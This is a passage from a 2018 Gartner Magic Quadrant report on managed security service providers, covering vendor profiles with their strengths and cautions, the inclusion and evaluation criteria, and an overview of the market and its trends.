Orange Business Services (Orange), headquartered in Paris and with regional offices in a wide variety of locations across the Asia/Pacific region, North America and Europe, offers a broad range of telecommunications and cloud-based IT infrastructure services, security consulting services, and MSSs. Orange’s MSSs are delivered using commercial and proprietary technologies for log management, event correlation and advanced threat detection, as well as some wider integrations with open-source big data technologies. Security Event Intelligence is the service offering for 24/7 threat detection and response. Threat intelligence is centered around malicious IP/URL/domain names curated by Orange collected from a large number of public and private feeds and sources, discoveries made on the Orange Internet backbone, and intelligence from Orange’s in-house CERT team. Services are delivered from seven SOCs (three located in Europe, one in India, one in Malaysia, and one each in Mauritius and Egypt). All SOCs are 24/7 except for the European and Malaysia SOCs, which use a “follow the sun” model. Data residency requirements are addressed on a case-by-case basis, with a majority of non-European clients being serviced from the India and Egypt SOCs.

Orange’s network and infrastructure service customers and multinational organizations, especially those with a European and Asia/Pacific business focus, seeking network-security-focused MSSs should consider Orange Business Services.

STRENGTHS
  • Orange is experienced in integrating and operating global networking and IT services with MSS.
  • Security device management services are a strong focus for the vendor.
  • Orange has a good understanding of regulatory frameworks around data privacy and residency, and caters to many different standards, especially in the European region, with a focus on France.
  • Orange customers give above-average marks for vendor and service capability satisfaction.
CAUTIONS
  • The Orange MSS portal has less self-service functionality and usability than many of its competitors, and lags behind in granular user access and control, and reporting abilities. Orange has added enhanced portal functionality over the past 12 months, focusing on search and visualization capabilities.
  • Orange has less mature capabilities in providing advanced attack analytics as part of its MSS, with a focus on sandboxing and malware analysis rather than network or endpoint-based detection approaches.
  • Orange has limited market visibility with Gartner clients for discrete MSSs.

Secureworks

Secureworks offers a range of MSSs and other security-specific services to customers globally. Corporate headquarters are located in Atlanta, with offices in London, Edinburgh, Sydney and Tokyo. Services are delivered from three 24/7 SOCs in the U.S. (Atlanta; Chicago; and Providence, Rhode Island); one 24/7 SOC in Edinburgh, Scotland; and one 24/7 SOC in Kawasaki, Japan. The SOCs are supported by a center of excellence in Romania that is focused on customer device management and new service innovation. MSS delivery is through Secureworks’ proprietary Counter Threat Appliance (CTA) and Counter Threat Platform (CTP), which leverages a shared big data platform and advanced analytics capabilities. Customer access to services is via the Secureworks Client Portal. A range of commercial log sources from customer-deployed technologies are supported, in addition to leveraging commercial and proprietary tools for managed network and host-based threat monitoring. Host and network-based advanced threat detection are provided through Secureworks’ Advanced Endpoint Threat Detection (AETD) service (via its proprietary Red Cloak agent or Carbon Black) and its Advanced Malware Protection and Detection (AMPD; in partnership with Lastline) service. The Secureworks Counter Threat Unit research team provides threat research and threat intelligence, malware analysis, and analytics support to the provider’s SOCs. Additional services, such as vulnerability scanning (both customer- or Secureworks-managed) and advanced threat intelligence services are also available to buyers.

Midsize, enterprise and government organizations seeking an established MSS that leverages a consistent, shared delivery approach with a global presence, and a security-focused set of offerings, should, consider Secureworks.

STRENGTHS
  • Advanced threat detection services are available for endpoint, whether leveraging the proprietary Red Cloak agent or Carbon Black, via the AETD service, which includes the ability to isolate hosts (either by the customer or by Secureworks’ SOC). Customers leveraging Secureworks iSensor in IPS mode, or via Secureworks managed firewalls, can self-initiate blocking for threats detected by the SOC.
  • Native support for IaaS monitoring in AWS and Azure is available, and includes capabilities for network and web app vulnerability management, which supports buyers requiring visibility and security monitoring in public cloud environments.
  • Secureworks offers an incident response retainer that is popular with buyers, which provides proactive as well as remote and on-site reactive response services.
  • Secureworks is highly visible with Gartner clients, and is frequently included in competitive MSS deals by North America-based midsize and enterprise buyers. It also has good visibility with U.K. buyers.
  • Gartner customers give positive feedback for Secureworks’ MSS offerings.
CAUTIONS
  • Secureworks lacks visibility with buyers in continental Europe and the Asia/Pacific region for MSSs.
  • Customers requiring raw event log retention (e.g., for compliance reporting and incident investigation purposes beyond 90 days) can opt for Secureworks’ on-premises log management offering (LogVault).
  • Monitoring for Office 365 and Salesforce is supported, but support for other popular SaaS solutions like Box, Dropbox and Workday are not yet available. There is no CASB option available.
  • Basic response services are available to AETD and device management customers, but other response services like forensics support, including malware analysis and threat hunting, require adding premium services.

Symantec

Symantec is headquartered in Mountain View, California, and has six SOCs: one each in the U.S., the U.K. and Japan, and three in the Asia/Pacific region (India, Australia and Singapore). The SOCs operate on a follow-the-sun model to provide 24/7 support. Customers are assigned to a primary SOC in their region along with a global team of analysts aligned to their specific industry vertical. Symantec’s Cyber Security Services offerings include security monitoring and management, including hosted log retention, security intelligence, incident response services and security skills development services. Symantec has a broad portfolio of security technology solutions. Recent acquisitions include Outlier Security (EDR), Skycure (mobile device protection), and Fireglass (isolation technology). Symantec’s MSS SOC technology platform is based on self-developed technology. Customer event and log data are analyzed by Symantec’s global SOCs and retained in the North American data center. Symantec meets data residency requirements through contractual arrangements and the EU Standard Model Clause. Symantec MSS supports advanced threat detection via integrations with its own solutions as well as third-party products for network monitoring and forensics capabilities, and for payload analysis. MSS monitoring of EDR and forensics tools is offered for Symantec and third-party products. Incident and breach response services are available on retainer or on an ad hoc basis to buyers looking for a single provider for MSSs and response services. Monitoring capabilities are available for popular SaaS, IaaS and public cloud services. Pricing for MSS is offered in two models: based on a per-device/event source cost or on an enterprisewide license that provides unlimited monitoring up to a set limit of event sources (aka nodes).

Enterprises seeking an established MSSP with a global presence should consider Symantec.

STRENGTHS
  • Symantec has a well-established threat intelligence capability via its DeepSight services.
  • Symantec’s MSS portal offers granular role definitions and strong support for tracking and managing incident workflow.
  • The enterprisewide pricing model offers larger customers flexibility in bringing security event sources into scope for monitoring, and avoids change orders to add event sources beneath the agreed-on total for monitoring.
  • MSS customers indicate that Symantec is effective in detecting and helping to respond to advanced threats and targeted attacks.
  • Symantec has good visibility for MSS among Gartner customers.
CAUTIONS
  • Symantec primarily focuses on security monitoring now and directly offers limited device management services, primarily for IDPS, and not for other security controls. Prospective customers seeking device management services in addition to monitoring must anticipate working with Symantec partners.
  • Current integrations with vulnerability scanning products do not enable MSS customers to schedule or run scans via Symantec’s MSS portal. Customers can view scan results in the portal.
  • Symantec’s MDR-type advanced threat detection offerings, one network-based and the other host-based, are in the limited pilot/early adopter phase. Buyers interested in using one of these services will need to validate when they are available in their geography.

Trustwave

Trustwave, a stand-alone business within Singtel Group Enterprise, is based in Chicago, with regional headquarters in London, Sao Paulo and Sydney. Trustwave has several partnerships with regional telecommunications and service providers (e.g., Rogers Communications in Canada, Optus in Australia, Globe Telecom in the Philippines and TIS in Japan) around the globe to provide MSSs to those partners’ customer bases. Trustwave has nine 24/7 SOCs around the globe — three in North America, two in Europe (Warsaw and London), and four in the Asia/Pacific region (Manila, Philippines; Singapore; Sydney; and Tokyo). In the case of its telecom partners, the 24/7 SOCs are operated by Trustwave, some of which are in colocated facilities with the partners. Trustwave has a large portfolio of security technologies — including SIEM, UTM, network access control, application security, WAF and anti-malware — and builds MSSs around those, as well as support for a variety of third-party security products. Threat intelligence and incident response services are provided in-house from the Trustwave SpiderLabs team. Trustwave offers a managed EDR service leveraging Carbon Black and CounterTack as partners. Midmarket and small enterprise organizations, especially those with PCI DSS compliance requirements, make up the majority of Trustwave customers; however, the vendor has increased its focus on large enterprise buyers.

Telecommunications customers that have formed strategic partnerships with Trustwave, as well as companies in the retail, hospitality, healthcare and banking vertical industries, should consider Trustwave for MSSs. Trustwave is a good option for customers that need both products and services from a single provider, as the vendor has several competitive security software- and hardware-based platforms.

STRENGTHS
  • Trustwave supports a large client base that spans small and midsize enterprises, as well as larger global organizations.
  • Trustwave has expanded its global footprint through strategic partnerships with communications service providers across the Asia/Pacific region and North America, implementing a customer- and vertical-centric delivery model across the newly established SOCs.
  • The vendor’s SpiderLabs’ security research, penetration testing activities and incident response teams provide threat intelligence that enhances the value of the MSSs both through integration of the threat intelligence data directly into monitoring workflow and the SpiderLabs’ analysts serving as a higher tier of skills for advanced triage.
  • Trustwave has moderate visibility with Gartner clients looking to purchase MSSs.
CAUTIONS
  • Trustwave is planning to release an update to its MSS portal. Customers coming on board should ensure that they are getting the new portal, and that they review the rollout plan and features for that portal to ensure that it does not affect their service continuity.
  • As Trustwave continues to add support for third-party security technologies, customers should validate when and to what extent the security products they have deployed will be fully supported by Trustwave MSSs.
  • Direct support for Office 365 and Salesforce is supported via APIs; however, support for other popular SaaS vendors requires the use of a CASB solution. Trustwave claims that support for other SaaS vendors is available via API integrations, but it requires sufficient lead time (up to 45 days) for development and implementation.

Verizon

Verizon is a telecommunications company headquartered in Basking Ridge, New Jersey, with regional offices in Reading, U.K., and Singapore, which offers MSSs and security consulting services. Verizon uses a global network of SOCs, with three SOCs in the U.S., four in the Asia/Pacific region (India and Australia), and two in Europe (Luxembourg and Germany). Verizon’s Unified Security Portal (USP) provides single portal access across all services and capabilities for customers. Verizon’s MSS platform includes log management capabilities allowing clients to search, index and store logs using technology based on Elasticsearch. A mix of proprietary and commercial technology including Splunk is used to analyze security data, which is ingested via Verizon’s proprietary Log Event Collector (LEC). Verizon uses regional SOCs and data retention to meet requirements for local data storage and analysis. Network Threat Advanced Analytics, which was added as a service in 2017, is available to both customers on the Verizon backbone network and also through NetFlow analysis capabilities deployed on a customer’s site. Malware analysis and network and endpoint forensics are available to buyers. Remote and on-site support for incident and breach response is provided via the Threat Intel and Response Service.

Enterprises, including existing Verizon network customers, should consider Verizon if they require well-established global or region-specific MSSs.

STRENGTHS
  • Verizon’s investment in reporting, communications features and data visualization enables clients to fully manage, interpret and investigate their security incidents within Verizon’s Unified Security Portal.
  • Netskope and Cisco Cloudlock, two leading CASB solutions, are currently supported by Verizon. Buyers with SaaS monitoring requirements should confirm support for their preferred CASB vendor.
  • Verizon has moderate visibility with Gartner clients for MSSs.
CAUTIONS
  • Verizon’s pricing model, specifically for the MSS Analytics service, is based on the data volume of log event and other data sources sent per day, measured in GB per day (management of security devices is still priced on a per-device basis). Buyers considering Verizon services should carefully analyze how much event and data volume they currently generate, and may generate, over time, to properly scope the service costs.
  • Vulnerability management in Verizon’s Unified Security Portal lags behind many competing MSSPs. Buyers should validate how Verizon integrates and leverages the data from their preferred vulnerability management solution.
  • Verizon lags behind competitors in its managed EDR service offerings. Leading EPP vendors are supported, but EDR-specific technologies are not yet supported.

Wipro

Wipro provides a variety of MSSs, including security threat monitoring, infrastructure security operations and technology management, vulnerability management, incident response, identity and access management, and security consulting services. Wipro is headquartered in Bangalore, India, with offices in London, New York, New Jersey and elsewhere around the globe. MSSs are delivered from 14 24/7 SOCs, with eight in India (Bangalore, Pune, Chennai, Mysore, Bhubaneswar, Kochi, Noida and Gurgaon), two in Europe (Amsterdam and Meerbush, Germany), and four in North America (Houston, Dallas, Phoenix and Edmonton, Canada). Wipro offers security event monitoring via its multitenant ServiceNXT platform, or Wipro can support customers that bring their own SIEM solution or require a specific, dedicated SIEM tool. Wipro currently supports six SIEM platforms. Customers access the Wipro MSSs through the Cyber Defense Center (CDC) portal, which provides a single landing page for accessing services used by customers. Wipro has a broad portfolio of technology partnerships available to buyers. Flexible options are also available to meet local or regional data residency requirements and regulations.

Buyers across Europe, the Americas and the Asia/Pacific region considering MSS as part of broader IT outsourcing activities, and enterprises seeking flexible options for managing a range of security controls, including SIEM tools, across a variety of IT environments, should consider Wipro.

STRENGTHS
  • Wipro makes newer technologies such as EDR, NTA and SOAR available to buyers and customers (as well as for use internally for service delivery where applicable). Wipro made additional strategic investments in 2017 (Demisto) to complement existing investments (Vectra and IntSights). Wipro plans to introduce services leveraging breach and attack simulation, as well as deception solutions, in the future.
  • Wipro has extensive partnerships across a range of security technologies that it can implement, and manage, and can use those tools on behalf of buyers to meet their specific or customized requirements.
  • Wipro’s MSS delivery approach is highly customizable to customers’ requirements and existing technology solutions.
  • Wipro customers report positive feedback for the vendor’s overall services and experience, but the feedback for the onboarding process is less positive.
CAUTIONS
  • Wipro is in the process of moving its primary delivery model to a shared, multitenant platform, instead of leveraging customer-specific SIEM tools as its default delivery model. That transition to the shared model is still a work in progress and delivery models still lean toward per-customer-specified SIEM solutions. Buyers preferring to leverage a shared delivery platform should evaluate the architecture and implementation to ensure that it is fit for their purposes and requirements.
  • Wipro has made many improvements to its CDC portal over the past 12 months toward usability and centralization of access to services, but it still lacks the features available in many competing MSS portals.
  • Wipro has low visibility with Gartner clients’ shortlists for stand-alone MSS deals.

Vendors Added and Dropped

We review and adjust our inclusion criteria for Magic Quadrants as markets change. As a result of these adjustments, the mix of vendors in any Magic Quadrant may change over time. A vendor’s appearance in a Magic Quadrant one year and not the next does not necessarily indicate that we have changed our opinion of that vendor. It may be a reflection of a change in the market and, therefore, changed evaluation criteria, or of a change of focus by that vendor.

Added

Capgemini, DXC Technology and Fujitsu were added.

Dropped

CSC and HPE Enterprise Services were dropped, as they merged under DXC Technology.

Inclusion and Exclusion Criteria

As a remote service, MSS can be delivered to and from any location with sufficient connectivity. MSSPs that have operations in one geographic region can support customers in other regions. Gartner sees a distinct preference among customers seeking MSSs to first consider MSSPs with a presence in their country or region (e.g., North America, Europe and the Asia/Pacific region). For global enterprises, that includes a presence in multiple regions where the enterprises operate, in order to provide more local support. Local presence enables the MSSP’s ability to keep some data in specific regions, as well as to provide local business hours and access to advanced support, staffing requirements (such as specific citizenship) and local language support, among other capabilities. In addition, compliance with data residency and privacy regulations can be addressed in many cases with local operations centers.

This Magic Quadrant includes MSSPs that have met thresholds for scale (expressed as devices supported and customers) and presence (SOCs) in multiple regions, as well as a threshold for MSS revenue.

The criteria include a threshold for the number of firewalls or network-based IDPS devices under monitoring or management, and a threshold for the number of MSS customers — both distributed across multiple regions. We note that many providers, in addition to MSSs, offer other service delivery options (such as local staff augmentation) and related services, like building SOCs at a customer’s premises, which may be supported remotely by the MSSP’s SOC. However, these are not evaluated within this research. Also excluded from this analysis are service providers that offer MSSs only as a component of another service offering (such as bandwidth or hosting), and vendors that provide MSSs only for their own technologies, not for third-party technologies.

Inclusion Criteria

Vendors must:

  • Have services to remotely monitor and/or manage firewalls and UTM systems, IDPS devices from multiple vendors via discrete service offerings, and shared-service delivery resources.
  • Have firewalls/IDPS devices under remote management or monitoring for external customers that meet a minimum threshold described below.
  • Have customers, as well as monitored firewalls and IDPS devices, across multiple geographies that meet a minimum threshold described below. The thresholds for customers and devices have increased from the prior Magic Quadrant to reflect market growth.
  • Have MSS revenue of $50 million or more in 2016. The threshold for revenue has increased from the prior Magic Quadrant.
  • Have a SOC presence in multiple geographic regions.
  • Have reference accounts that are relevant to Gartner clients in the appropriate geographic regions.
  • Be service providers that Gartner determines to be significant vendors in the market because of their market presence or service innovation.

Inclusion thresholds for firewalls/IDPS devices under MSSs are 389 in the Asia/Pacific region, 2,473 in Europe, 3,709 in North America and 45 in the rest of the world (ROW). MSSPs must meet the thresholds in one of the following combinations:

  • Asia/Pacific and Europe
  • North America and the ROW
  • Asia/Pacific and North America
  • Europe and North America

Inclusion thresholds for MSS clients are 75 in the Asia/Pacific region, 118 in Europe, 355 in North America and 19 in the ROW. MSSPs must meet the thresholds in one of the following combinations:

  • Asia/Pacific and Europe
  • North America and the ROW
  • Asia/Pacific and North America
  • Europe and North America

Exclusion Criteria

Vendors that have:

  • Service offerings that are available only to end users that buy other non-MSSs
  • Services that monitor or manage only the service provider’s own technology
  • Services delivered by service provider resources dedicated to a single customer
  • Services that fail to meet the inclusion criteria

Evaluation Criteria

Ability to Execute

Product/Service refers to the service capabilities in areas such as information and log management; security event management; threat detection, monitoring and alerting; incident management and response; workflow; reporting; and service levels.

Overall Viability (Business Unit, Financial, Strategy, Organization) includes an assessment of the organization’s overall financial health, as well as the financial and practical success of the business unit. Includes the likelihood of the organization to continue to offer and invest in the product as well as the product position in the current portfolio.

Sales Execution/Pricing evaluates the service provider’s success in the MSSP market and its capabilities in presales activities. This also includes MSS revenue, pricing and the overall effectiveness of the sales channel. The level of interest from Gartner clients is also considered.

Market Responsiveness/Record evaluates the match of the MSS offering to the functional requirements stated by buyers at time of acquisition. It also evaluates the MSSP’s track record in delivering new functions when the market needs them.

Marketing Execution is an evaluation of the service provider’s ability to effectively communicate the value and competitive differentiation of its MSS offering to its target buyer.

Customer Experience evaluates the service delivery to customers. The evaluation includes ease of deployment, the quality and effectiveness of monitoring and alerting, and reporting and problem resolution. This criterion is assessed by surveys of vendor-provided reference customers, Gartner’s Peer Insights solution as well as by feedback from Gartner clients that are using an MSSP’s services, or have completed competitive evaluations of the MSSP’s offerings.

Operations covers the MSSP’s service delivery resources, such as infrastructure, staffing and operations reviews, or certifications.

Table 1.   Ability to Execute Evaluation Criteria

Evaluation Criteria

Weighting

Product or Service

High

Overall Viability

Medium

Sales Execution/Pricing

Medium

Market Responsiveness/Record

High

Marketing Execution

Medium

Customer Experience

High

Operations

Medium

Source: Gartner (February 2018)

Completeness of Vision

Market Understanding involves the MSSP’s ability to understand buyers’ needs and to translate them into services. MSSPs that show the highest degree of market understanding are adapting to customer requirements for specific functional areas and service delivery options. MSSPs with market-leading vision are investing in expertise and technology to monitor and analyze the external threat environment to better understand the sources, motives, targets and methods of attackers.

They are using that insight to improve the effectiveness of their MSS. They are also developing and introducing services that support large-scale data collection; advanced analytics, including statistical and behavioral functions; and monitoring of new data sources, such as endpoint, network and user to include in analysis. The goal of these capabilities is to more effectively find and respond to attacks, both broad-based and advanced targeted-type attacks.

Marketing Strategy evaluates clear, differentiated messaging consistently communicated internally, and externalized through social media, advertising, customer programs and positioning statements, and is tailored to the specific client drivers and market conditions in the MSS market.

Sales Strategy evaluates the strategy for selling that uses the appropriate networks, including direct and indirect sales, marketing, service, and communication, as well as partners that extend the scope and depth of market reach, expertise, technologies, services and their customer base.

Offering (Product) Strategy evaluates the provider’s approach to product development and delivery that emphasizes functionality and delivery options as they map to current and emerging requirements for MSSs. Development plans are also evaluated.

Vertical/Industry Strategy evaluates the strategy to direct resources (sales, product and development), skills and products to meet the specific needs of individual market segments, including verticals.

Innovation refers to the service provider’s strategy and ability to develop new MSS capabilities and delivery models to uniquely meet critical customer requirements. Examples include the capabilities described in Market Understanding.

Geographic Strategy addresses the vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries, as appropriate for that geography and market.

Table 2.   Completeness of Vision Evaluation Criteria

Evaluation Criteria

Weighting

Market Understanding

High

Marketing Strategy

Medium

Sales Strategy

Medium

Offering (Product) Strategy

High

Business Model

Not Rated

Vertical/Industry Strategy

Medium

Innovation

High

Geographic Strategy

Medium

Source: Gartner (February 2018)

Quadrant Descriptions

Leaders

Each of the service providers in the Leaders quadrant has significant mind share among organizations looking to buy MSSs as a discrete offering. These providers typically receive positive reports on service and performance from Gartner clients. MSSPs in the Leaders quadrant are typically appropriate options for enterprises requiring comprehensive portal-based access for interfacing with the service (e.g., responding to alerts, incident management, workflow, reporting, asset and access management, and managing other procured services, like vulnerability management) along with interaction with the MSSP for analyst expertise and advice.

Challengers

In the Challengers quadrant, Gartner customers are more likely to encounter MSSs that are offered as components of an IT or network service provider’s (NSP’s) other telecommunications, outsourcing or consulting services. Although an MSS is not a leading service offering for this type of vendor, MSSs in these markets tend to have a strong Ability to Execute and offer buyers capabilities when procuring services from a single provider aligns with the organizations’ IT strategy.

Visionaries

Companies in the Visionaries quadrant have demonstrated the ability to turn a strong focus on managed security into high-quality service offerings for the MSS market. These service providers are often strong contenders for enterprises that require access to and support for “cutting edge” technology, flexible service delivery options and strong customer service. MSSPs in the Visionaries quadrant have less market coverage and fewer resources or service options compared with vendors in the Leaders quadrant.

Niche Players

Niche Players are characterized by service offerings that are available primarily in specific market segments, or primarily as part of other service offerings. These service providers often tailor MSS offerings to specific requirements of the markets they serve. This quadrant is also characterized by providers that are newer, or have expanded beyond local and regional markets, to the global MSS market, and are maturing their delivery capabilities and offerings.

Context

Prospective MSS buyers with threat management use cases should highly weight MSSPs’ threat research, security intelligence and threat detection capabilities.

Prospective MSS users should require a proof of concept (POC), or a demonstration of MSS offerings, to validate ease of use, effectiveness and value. Current MSS customers should leverage POCs for new offerings from their existing MSSP before purchasing.

Current and prospective MSS users should validate MSSPs’ services to address advanced attacks via network behavior, network forensics, payload analysis, endpoint behavior and endpoint forensics, or consider MDR providers that specialize in such attack detection capabilities.

Global coverage matters to global enterprises. The MSS market includes a wide range of providers available only in a single region or country. If your organization is not global and wants good local support and presence, then carefully evaluate a global MSSPs ability to “look local.”

Market Overview

The MSS market is a mature one, offering buyers a variety of options from a diverse set of providers that generally align to a core focus. MSS is provided by pure-play security providers, IT system integrators and outsourcers, and network services providers. Buyers leverage MSSPs to address requirements that include 24/7 monitoring and threat detection, security technology management, and meeting a variety of compliance requirements. The preferred approach is to leverage a shared-service model where resources and support are remotely delivered by the provider. These may be complemented by related drivers, such as access to deeper or broader security expertise than is available in-house given the industry concern about the lack of available security resources and expertise, and the ability to retain those resources, or the need to redirect existing internal resources to other higher-value security functions inside the organization. Gartner clients interested in MSSs are increasingly looking for providers with effective threat detection capabilities that can detect both broad-based as well as advanced threats, and offer incident response services that may extend all the way through to the containment and remediation of a threat, either remotely or through physical on-site support.

This Magic Quadrant reflects the requirements of customers with service needs in multiple geographic regions. MSSPs included in the evaluation meet the minimum thresholds for MSS delivery in two or more regions via in-region SOCs. MSSPs with a multiregional presence typically have a sufficient understanding of region-specific customer requirements, as well as sufficient service delivery capabilities that can scale to support global service delivery. Customers with a mix of global delivery requirements and local regulatory requirements related to, for example, data privacy, may require customized services.

MSSPs that do not meet the criteria for inclusion in this Magic Quadrant may still deliver high-quality services within a continental or geographic region or regions. When considering MSSs, Gartner customers should develop evaluation criteria that meet their specific requirements, and take geography (language, local resources, etc.) into account, where applicable.

Market trends, which are discussed in more detail below, include:

  • Moving beyond monitoring of only network-based security technologies, particularly the network perimeter, with increasing focus on the endpoint (e.g., managed EDR services)
  • Increasing movement toward more customized outcomes for buyers
  • Buyer demand for capabilities to monitoring popular SaaS applications, and public cloud services providers and IaaS

The MSS market is growing at a healthy double-digit rate — in 2016, the market grew 10% to reach $9.4 billion in revenue (see“Market Share Analysis: Managed Security Services, Worldwide, 2016” ), and Gartner expects this growth rate to be in the 15% to 17% range for 2017. The MSS market constitutes approximately 60% of the overall security outsourcing market that will generate $18.7 billion revenue in 2017, growing at a CAGR of 11% through 2021. It is important to view MSS in the context of broader security outsourcing, because large enterprises are increasingly looking for hybrid engagements that include a mix of shared and dedicated service delivery components.

Demand for MSSs, from enterprises and midsize organizations, is driven primarily by a variety of factors:

  • Security staffing challenges and budget shortages: Gartner sees organizations of all sizes and geographies continuing to be challenged to attract and afford the appropriate security and risk management staff (see “Adapt Your Traditional Staffing Practices for Cybersecurity” ). Also, in an increasingly hostile external threat environment (see “How to Respond to the 2018 Threat Landscape” ), Gartner security and risk management leaders continue to report a lack of sufficient funding and increasing budget pressures that affect their security monitoring and operations capabilities.
  • Midsize enterprise adoption of detection and response capabilities: Midsize organizations are embracing detection and response capabilities to complement their investments in preventive security controls. These organizations are also impacted by the increasing scarcity (or affordability) of security operations talent. These organizations are looking for MSSPs to act as extensions of their security staff, instead of adding security head count. MSSPs can provide these services on a 24/7 basis, allowing customers to devote their often scarce internal security resources to higher-value activities.
  • Customized requirements: There is an increasing segmentation of the MSS market between providers that focus on a shared-service approach where offerings are homogenously applied across customers with minimal, if any, room for customization. These are generally the purview of the pure-play MSSPs. The IT outsourcers (ITOs) and NSPs that have MSS offerings are increasingly focused on providing customized solutions to larger enterprises in order to meet very specific requirements. These typically revolve around support for a wide range of security technologies, especially more “learn forward” technologies that the organization has already, or plans to, deploy, but lacks the expertise and skills to run and use those tools. The increasing demand for SOC build-outs in specific regions (e.g., Middle East and India) is also fueling the demand for customized services where MSS capabilities may be leveraged, like providing remote, out-of-business-hours support to complement the on-site provider’s staff manning the provider-run, customer-specific SOC.
  • First-time/early-cycle MSS customers: The MSS market is still attracting buyers. In both mature and emerging regions, there are organizations that are in their first cycle of building out threat detection and response capabilities. MSS forms a critical part of this because these organizations typically have low organizational competency in security and operate using lean security teams, and are therefore looking for opportunities to outsource security event monitoring, alerting and response. These “first cycle” MSS adopters are driving significant growth for the market.
  • Evolving compliance reporting requirements: Requirements such as GDPR (see “GDPR Clarity: 19 Frequently Asked Questions Answered” ) as well as corporate governance policies, are directly driving stronger requirements for threat monitoring, identification and incident response capabilities. As formal compliance regimes become more stringent or more pervasive, organizations are turning to external service providers to address the need to meet compliance requirements.
  • Expansion of security event monitoring into new domains: As organizations adopt cloud services (e.g., SaaS and IaaS predominantly), concerns about the lack of visibility into these environments from a security and risk management perspective are increasing. Customers considering MSS for security services are asking about MSSP capabilities for monitoring these environments.

MSS customers and buyers continue to express dissatisfaction with MSS providers, although they represent the minority. Some of the common reasons for customers switching MSSPs or opting for another delivery model include a lack of perceived value versus the costs for MSSs, providers that fail to detect threats or generate a high-level of false positives, and poor quality of service delivery and support during critical incidents. In particular, security and risk management leaders have increasing expectations that their MSSP will act as extensions of their security capabilities or teams to provide incident investigation and response support. These organizations are not resourced to consume just Tier 1 security operations capabilities where they only receive notifications of an incident and are expected to perform their own incident triage and investigation. That may be appropriate for large enterprises with adequately resourced security teams that want, and can, maintain responsibilities for incident triage, investigation and response.

Alternatives to using an MSSP include:

  • Managed detection and response services: Organizations have been increasingly looking for threat-detection-oriented service providers that offer more turnkey monitoring services coupled with higher-touch services. MDR service providers (see “Market Guide for Managed Detection and Response Services” ) are gaining increasing attention with buyers, particularly in the midsize and smaller enterprises. However, adoption by larger enterprises to augment existing capabilities, especially for advanced threat detection, is also occurring. Many MSSPs have introduced MDR-like services that are turnkey offerings using dedicated technology providers as premium services, but these are primarily focused on advanced threat detection use cases, usually via managed EDR or threat hunting. The use of network technologies for MDR-type services is starting to emerge. Gartner anticipates this trend to continue as MSSPs race to compete with the MDR providers.
  • Remote co-management of a customers’ SIEM solution: Increasingly, buyers across the midsize and larger enterprises are purchasing SIEM solutions, but looking for specific service providers to assist. Services available to the buyer range from engineering, tuning and performance monitoring of the customer’s SIEM tool, whether it’s on-premises, hosted by a provider or SaaS SIEM (see “Selecting and Deploying SaaS SIEM for Security Monitoring” ), all the way to complete management and 24/7 monitoring and alerting (in effect being an MSS to the customer, just using the customer’s technology). Buyers purchase their own SIEM tools for a variety of reasons (see “How and When to Use Co-managed Security Information and Event Management” ). In response to this trend, MSSPs are increasingly adding co-managed SIEM support for two to three SIEM solutions.
  • Organizations building their own, dedicated SOCs: Organizations decide to build and operate their own SOCs because they:
    • Desire more control over their detection and response technologies (either driven internally or due to regulatory requirements)
    • Require better access to their own data (for threat investigations or compliance purposes)
    • Have unique or specialized use cases or environments where more customized correlation/analytics is required (e.g., OT security monitoring requirements).
    • May be unaware of the concept of shared MSS, particularly because providers do not offer it to them. This is particularly true in emerging markets.
  • To adapt to these requirements, MSSPs are adding or expanding customized services to customers for SOC build-outs (see“How to Plan, Design, Operate and Evolve a SOC” ).

Challenges to using an MSSP include:

  • Ability to deliver “integrated” incident response: MSS buyers should be aware when considering these services as most MSSPs still have limitations and barriers between the basic triage and customer notification of a potential incident, and specific incident response activities, such as collecting suspect binaries and performing analysis, which is then used to ascertain the type of threat, sophistication, attribution and scope of distribution inside an organization. Many MSSPs have incident response retainers that are required to be purchased by a customer in order to have access to these types of technical incident response functions and experts.
  • Data residency and other privacy requirements: Regulatory requirements regarding movement of and access to specific types of data may limit the scope of monitoring enterprises entrusted to MSSPs. For example, GDPR may drive more stringent requirements for MSSPs depending on the geography in which the MSS buyer operates.
  • Change in strategy to reduce outsourcing: At the enterprise level or within the security organization, a change in strategy (sometimes driven by changes in leadership) regarding the use of external services can mean that MSSs are not considered effective options.
  • Lack of customization: By definition, MSSs are meant to be standardized in terms of device management, analytics/correlation rules, and reporting and notifications. Customers that want more customization of their security operations may find that some MSSPs may be less than ideal for them if they focus on delivering shared services with little to no customization.

MSSP Landscape

The basic makeup of the MSSP vendor space has not changed fundamentally as the market is mature. There are three major types of MSSPs. Overlap between these types occurs in the market, but MSSPs tends to fall into one of the categories.

  • Pure plays: These are generally smaller, privately held MSSPs that are completely focused on security services. Most of these MSSPs tend to serve a local market or region, but not all regions around the world. New pure-play security service providers often focus on specific vertical markets (e.g., legal, healthcare providers, energy and utilities) or regulatory requirements, or advanced threat detection technologies (e.g., managed EDR services). Gartner expects existing MSSPs and other IT services firms to acquire pure-play service providers that offer threat-detection-oriented services and advanced threat detection capabilities, especially those in the MDR space.
  • NSPs: These are network bandwidth and connectivity providers that manage and monitor network security products. They often provide remote monitoring, premises-based technologies and cloud-based services through their internet connections. Buyers that consume managed telecommunications services tend to include MSS when available as firewalls and other network-based security technologies can be a core component of the outsourcing deals.
  • ITOs/system integrators/business process outsourcers: These are IT services providers that typically manage security devices as part of large outsourcing or system integrations initiatives, where it makes sense for buyers to consume MSS as part of broad infrastructure management and monitoring deals.

In addition to the above common types of MSSPs, security consulting providers and some product vendors are emerging entrants offering MSSs. Security consulting has realized that MSS and ongoing security operations contracts are more of a profitable, predictable and faster-growing revenue stream than one-off consulting projects. Many of these consultants are more active in dedicated SOC staffing services than MSS, but this is still a category of providers to watch. Also worth noting is that many IT outsourcers with security consulting businesses are also becoming more active as MSSPs, through either acquisitions or the organic build-out of capabilities.

Some product vendors such as Cisco, CrowdStrike, F-Secure, FireEye and Rapid7 (among others) also offer MSS and/or MDR services. The primary motivation for these technology vendors in entering this market has been to increase their recurring revenue by attaching more annuity-based services to one-time product sales. Also, for new product areas in security (like EDR), offering managed services allows customers to better utilize the underlying technology product (because it can be more complex and time-consuming than anticipated once fully deployed) and helps them overcome skills shortages associated with newer security technology areas. However, product vendors are still very much a niche play in the broader MSS market.

MSS Portfolio

The services that are core to MSS offerings involve vendor-agnostic monitoring and management of core security technologies, with a focus on:

  • Firewalls and next-generation firewalls (NGFs)
  • Network IDPSs and next-generation IDPS
  • Multifunction firewalls/UTMs
  • SWGs and URL filters
  • EPPs

